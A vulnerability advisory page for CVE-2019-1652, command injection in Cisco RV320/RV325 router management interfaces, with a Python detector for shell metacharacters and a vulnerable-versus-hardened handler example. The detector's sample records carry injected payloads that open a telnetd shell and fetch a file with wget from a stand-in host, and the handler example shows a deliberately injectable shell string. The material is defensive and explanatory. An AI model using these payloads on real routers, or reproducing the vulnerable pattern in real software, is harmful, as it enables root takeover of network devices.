Cyber Resilience

CVE-2019-1652

Severity: High · CISA KEV · Active Exploitation · EUVD Exploited · Public PoC · RCE

Published: 24 January 2019
Modified: 28 October 2025
KEV Added: 03 March 2022
Patch: available
CVSS v3.1 base score: 7.2 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
EPSS score: 0.9273 (99.8th percentile)
Risk Priority: 90 (weighted 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2019-1652 is a high-severity Improper Input Validation (CWE-20) vulnerability in the firmware of Cisco Small Business RV320 and RV325 routers. Its CVSS v3.1 base score is 7.2 (High).

Operationally, it ranks in the top 0.2% of all CVEs by EPSS exploit likelihood, CISA has added it to the Known Exploited Vulnerabilities catalog, and public proof-of-concept code is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers allows an authenticated remote attacker with administrative privileges to execute arbitrary commands on the underlying Linux shell as root. The issue stems from improper validation of user-supplied input (CWE-20 and CWE-78) and is exploitable by sending crafted HTTP POST requests to the management interface. It carries a CVSS 3.1 base score of 7.2; the PR:H component of the vector reflects the requirement for administrative credentials, so practical exposure depends on whether the management interface is reachable from untrusted networks and on the strength and handling of those credentials.

An attacker who already possesses administrative credentials on an affected device can leverage the flaw to run commands with root privileges, potentially compromising the router's configuration, traffic, or connected networks. Public exploit code demonstrating command injection against these models has been published on Packet Storm and Seclists.
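As an added example (not code from this page, from Cisco, or from the published proof-of-concept material), the following detection logic flags POST requests to a router's web management interface whose form fields carry shell metacharacters or command substitution, which is the request shape the advisory describes. The sample records are constructed; the record layout, the endpoint paths and the field names are assumptions, since the routers themselves do not log POST bodies and the real source of such records would be a reverse proxy, WAF or packet capture in front of the device.

```python
"""Detection logic for command-injection attempts against a router web
management interface, the request shape behind CVE-2019-1652.

Added example: not code from the page, from Cisco or from the public PoCs.
The record layout, endpoint paths and field names are assumptions used for
illustration; the sample records are constructed.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Characters and syntax an injected value needs to break out of a shell
# command line: separators, pipes, backticks, newlines, $(...) and ${...}.
SHELL_META = re.compile(r"[;&|`\n]|\$\(|\$\{")

# Constructed sample records: (source IP, method, URL, raw POST body).
SAMPLE_REQUESTS = [
    ("192.0.2.10", "GET", "/cgi-bin/status.cgi", ""),
    ("192.0.2.10", "POST", "/cgi-bin/config.cgi",
     "hostname=branch-rtr&domain=example.net"),
    # $(telnetd -l /bin/sh -p 4444) injected into a certificate field
    ("198.51.100.7", "POST", "/cgi-bin/cert.cgi?type=4",
     "common_name=%24%28telnetd+-l+%2Fbin%2Fsh+-p+4444%29&org=x"),
    # a;wget http://198.51.100.7/x -O /tmp/x injected via a ';' separator
    ("198.51.100.7", "POST", "/cgi-bin/cert.cgi?type=4",
     "common_name=a%3Bwget+http%3A%2F%2F198.51.100.7%2Fx+-O+%2Ftmp%2Fx&org=x"),
]


def parse_form(encoded):
    """Split an application/x-www-form-urlencoded string into decoded
    (name, value) pairs. Splits on '&' only, then percent-decodes, so a
    literal ';' inside a value survives (parse_qsl on older Pythons
    treats ';' as a separator and would hide that case)."""
    pairs = []
    for chunk in encoded.split("&"):
        if not chunk:
            continue
        name, _, value = chunk.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def suspicious_fields(encoded):
    """Return the decoded (name, value) pairs whose value contains shell
    metacharacters. Matching happens after decoding: the wire form of
    '$(' is '%24%28', which a regex over the raw body would miss."""
    return [(n, v) for n, v in parse_form(encoded) if SHELL_META.search(v)]


def scan(records):
    """Flag POST requests whose body or query string carries a suspicious
    field value. Returns one finding per request."""
    findings = []
    for src, method, url, body in records:
        if method != "POST":
            continue
        parts = urlsplit(url)
        # Some handlers read query-string parameters alongside the body,
        # so both are checked.
        hits = suspicious_fields(body) + suspicious_fields(parts.query)
        if hits:
            findings.append({"src": src, "path": parts.path, "fields": hits})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding["src"], finding["path"], finding["fields"])
```

The decode-then-match order matters: an exploit sends `$(`, `;` and spaces percent-encoded, so a rule that inspects the raw body would miss every real attempt. The metacharacter list is deliberately broad; on a management interface that only ever receives hostnames, IP addresses and option values, any hit is worth a look, and the authenticated source address is the first pivot for the investigation.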

Cisco has released firmware updates that address the vulnerability. The listed references consist primarily of technical disclosures and proof-of-concept material rather than official mitigation guidance.

EU & UK References

Vulnerability details

A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. Cisco has released firmware updates that address this vulnerability.

CWE(s): CWE-20 (Improper Input Validation), CWE-78 (OS Command Injection)

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

Cisco RV320 firmware: 1.4.2.15 — 1.4.2.22
Cisco RV325 firmware: 1.4.2.15 — 1.4.2.22

Mitigating Controls (NIST 800-53 r5)

SI-10 (Information Input Validation)
prevent

Directly requires validation of user-supplied input on the web management interface, blocking the crafted HTTP POST requests that trigger command injection.

SI-2 (Flaw Remediation)
prevent

Mandates timely application of vendor firmware updates that remediate the improper input validation flaw (CWE-20/CWE-78).

CM-7 (Least Functionality)
prevent

Restricts the router to only the necessary management functions and interfaces, reducing the attack surface available to an authenticated administrator.
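To make the SI-10 control concrete, here is an added example (not the RV320/RV325 firmware code, and not from Cisco) of a command-building web handler in its vulnerable shape beside a hardened one. The handler, the form field name `common_name` and the openssl invocation are assumptions chosen to illustrate CWE-78; the device's real handler is not on this page.

```python
"""A command-building web handler in its vulnerable shape (CWE-78) beside
a form that applies the input validation SI-10 calls for.

Added example: not the RV320/RV325 firmware code. The handler, the form
field name 'common_name' and the openssl invocation are assumptions used
to illustrate the flaw class; nothing here is the device's real handler.
"""
import re
import shlex


def build_cert_command_vulnerable(common_name):
    """CWE-78: the request field is spliced into a shell command string.
    Single quotes around the value do not help: a value such as
    x';id;' closes the quote and adds a second command."""
    return ("openssl req -new -subj '/CN=%s' -nodes "
            "-keyout /tmp/k.pem -out /tmp/r.csr" % common_name)


# SI-10: an allowlist for a certificate Common Name, hostname characters
# only. A wildcard CN such as *.example.net is rejected by this pattern;
# widen it deliberately if that is needed rather than dropping the check.
CN_ALLOWED = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,62}")


def validate_common_name(common_name):
    """Return the value unchanged if it matches the allowlist, else raise."""
    if not CN_ALLOWED.fullmatch(common_name):
        raise ValueError("common_name contains characters outside the allowlist")
    return common_name


def rejects(common_name):
    """True if the allowlist rejects the value."""
    try:
        validate_common_name(common_name)
    except ValueError:
        return True
    return False


def build_cert_command_hardened(common_name):
    """Validate first, then build an argv list. Passing a list to
    subprocess.run without shell=True means no shell ever parses the
    value, so metacharacters that slip past the allowlist are still inert."""
    cn = validate_common_name(common_name)
    return ["openssl", "req", "-new", "-subj", "/CN=" + cn, "-nodes",
            "-keyout", "/tmp/k.pem", "-out", "/tmp/r.csr"]


SEPARATORS = {";", "|", "&", "&&", "||"}


def shell_would_run_extra_command(cmdline):
    """Tokenise a command line the way a POSIX shell would (quotes honoured,
    ;|& as separate tokens) and report whether a command separator survives
    outside quoting. This inspects the string; it does not execute it."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return any(tok in SEPARATORS for tok in lexer)


if __name__ == "__main__":
    for value in ("vpn.example.net", "x';id;'"):
        cmd = build_cert_command_vulnerable(value)
        print(repr(value), "extra command:", shell_would_run_extra_command(cmd))
```

The two defences are independent and both are needed: the allowlist stops values that have no business in a hostname, and the argv form removes the shell from the path entirely, so a field the allowlist was never applied to cannot be turned into a command either. Quoting the value inside a shell string, by contrast, is not a fix, as the `x';id;'` case shows.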
